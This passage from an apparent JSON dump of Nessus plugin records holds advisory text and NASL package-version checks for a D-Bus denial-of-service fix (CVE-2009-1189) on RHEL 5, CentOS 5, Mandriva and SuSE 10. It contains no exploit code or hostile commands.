The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43819);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_bugtraq_id(31602);\n script_xref(name:\"RHSA\", value:\"2010:0018\");\n\n script_name(english:\"RHEL 5 : dbus (RHSA-2010:0018)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1189\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0018\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0018\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-devel-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-libs-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", 
cpu:\"i386\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus / dbus-devel / dbus-libs / dbus-x11\");\n }\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-06T09:26:07", "description": "Updated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.", "edition": 26, "published": "2010-01-08T00:00:00", "title": "CentOS 5 : dbus (CESA-2010:0018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "modified": "2010-01-08T00:00:00", "cpe": ["p-cpe:/a:centos:centos:dbus-libs", "p-cpe:/a:centos:centos:dbus-devel", "p-cpe:/a:centos:centos:dbus", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:dbus-x11"], "id": "CENTOS_RHSA-2010-0018.NASL", "href": "https://www.tenable.com/plugins/nessus/43817", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0018 and \n# CentOS Errata and Security Advisory 2010:0018 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43817);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_bugtraq_id(31602);\n script_xref(name:\"RHSA\", value:\"2010:0018\");\n\n script_name(english:\"CentOS 5 : dbus (CESA-2010:0018)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. 
It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-January/016433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?155d8856\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-January/016434.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfa0285e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dbus packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-devel-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-libs-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus / dbus-devel / dbus-libs / dbus-x11\");\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:21", "description": "A vulnerability was discovered and corrected in dbus :\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic to\nvalidate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. 
NOTE: this is due to an incorrect fix for\nCVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers", "edition": 25, "published": "2009-10-07T00:00:00", "title": "Mandriva Linux Security Advisory : dbus (MDVSA-2009:256-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "modified": "2009-10-07T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libdbus-1_3", "p-cpe:/a:mandriva:linux:lib64dbus-1_3", "p-cpe:/a:mandriva:linux:libdbus-1_3-devel", "p-cpe:/a:mandriva:linux:dbus-x11", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:dbus", "p-cpe:/a:mandriva:linux:lib64dbus-1_3-devel"], "id": "MANDRIVA_MDVSA-2009-256.NASL", "href": "https://www.tenable.com/plugins/nessus/42046", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:256. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42046);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1189\");\n script_bugtraq_id(31602);\n script_xref(name:\"MDVSA\", value:\"2009:256-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : dbus (MDVSA-2009:256-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was discovered and corrected in dbus :\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic to\nvalidate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. 
NOTE: this is due to an incorrect fix for\nCVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dbus-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64dbus-1_3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64dbus-1_3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libdbus-1_3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libdbus-1_3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dbus-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dbus-x11-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64dbus-1_3-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64dbus-1_3-devel-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libdbus-1_3-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libdbus-1_3-devel-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T06:29:46", "description": "Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). 
This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.", "edition": 22, "published": "2011-04-29T00:00:00", "title": "SuSE 10 Security Update : dbus (ZYPP Patch Number 7483)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4352", "CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DBUS-1-7483.NASL", "href": "https://www.tenable.com/plugins/nessus/53590", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53590);\n script_version (\"1.6\");\n script_cvs_date(\"Date: 2019/10/25 13:36:43\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\", \"CVE-2010-4352\");\n\n script_name(english:\"SuSE 10 Security Update : dbus (ZYPP Patch Number 7483)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). 
This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3834.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1189.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4352.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7483.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif 
(rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-glib-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-gtk-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-java-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-mono-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-python-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-qt3-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-qt3-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-x11-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.29.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T06:29:46", "description": "Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). 
This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.", "edition": 22, "published": "2011-12-13T00:00:00", "title": "SuSE 10 Security Update : dbus (ZYPP Patch Number 7482)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4352", "CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DBUS-1-7482.NASL", "href": "https://www.tenable.com/plugins/nessus/57177", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57177);\n script_version (\"1.4\");\n script_cvs_date(\"Date: 2019/10/25 13:36:43\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\", \"CVE-2010-4352\");\n\n script_name(english:\"SuSE 10 Security Update : dbus (ZYPP Patch Number 7482)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). 
This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3834.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1189.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4352.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7482.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif 
